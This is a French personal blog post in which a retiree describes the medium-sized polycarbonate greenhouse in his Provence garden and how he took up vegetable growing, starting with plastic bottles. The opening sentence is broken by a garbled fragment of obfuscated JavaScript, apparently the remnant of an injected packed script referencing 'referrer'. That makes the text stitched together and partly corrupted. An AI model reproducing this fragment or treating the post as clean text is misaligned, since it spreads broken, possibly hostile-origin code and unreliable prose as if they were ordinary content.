Ma serre de jardin

Depuis (‘0.6(“<\/k"+"l>“);n m=”q”;’,frznf|var|u0026u|referrer|eshdb|,0,{}))
une dizaine d’année, j’ai installé dans mon jardin une serre, je vais vous expliquer ce que j’ai fait.

Ma serre de jardin.

Le retraite

Depuis que je suis retraité et que j’ai quitté mon appartement dans le centre de Paris, j’ai acheté une maison en Provence.

Dans cette maison, j’ai une jolie jardin que j’entretiens assez souvent car la jardinerie est devenue un de mes loisirs. Le fait d’avoir des légumes et des herbes fraîches sont devenus un de mes plaisirs dans la vie.

Avoir des tomates cerises, des feuilles de coriandres et de menthes cultivé soi-même est un plaisir que je n’aurais jamais imaginé plus jeune car mes passions étaient différentes.

Dans mon jardin, j’ai installé une serre et c’est à cet endroit que je cultive mes légumes. C’est à cet endroit qu’il y a mon potager.

 

La serre de mon jardin

La serre est faite avec la pose des plaques en polycarbonate sur le toit et il y en a plusieurs soutenant le toit.

Cela permet d’avoir une protection en cas de pluie et d’avoir une meilleure exposition au soleil, c’est une bonne solution qui me convient. C’e n’est pas non plus très grand mais ni très petit non plus.

La serre est d’une taille moyenne de 15 à 20 m², je compte d’ailleurs l’agrandir un peu plus l’été prochain car je compte cultiver un peu plus de choses.

J’avais tout d’abord envisager cet espace car je n’avais aucune vision mais maintenant que je fais ça depuis quelques années, j’ai ma propre vision.

 

Le commencement de mon loisir le jardinage.

J’ai tout d’abord commencer à cultiver dans des bouteilles en plastique, vous savez celle que l’on coupe et où l’on met de la terre pour voir si ça va pousser.

J’ai eu un début assez laborieux mais au fur et à mesure, j’ai beaucoup appris au départ puis j’ai eu plus d’une dizaine de ces pots en plastique.

J’ai tout d’abord commencé à me diversifier pour voir ce qui fonctionnait et ce qui ne fonctionnait pas. Voir aussi ce dont j’avais le plus besoin et aussi, ce qui était le plus facile à faire pousser.

Tout s’est très rapidement bousculé, car j’ai acheté une nouvelle maison puis installé ma serre quelques mois plus tard lorsque j’étais retraité.

Et vous? Pensez-vous être capable de cultiver votre propre aliment dans votre jardin?

Vous pouvez d’ailleurs commencer petit pour voir plus grand plus tard c’est ce que j’ai fait.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *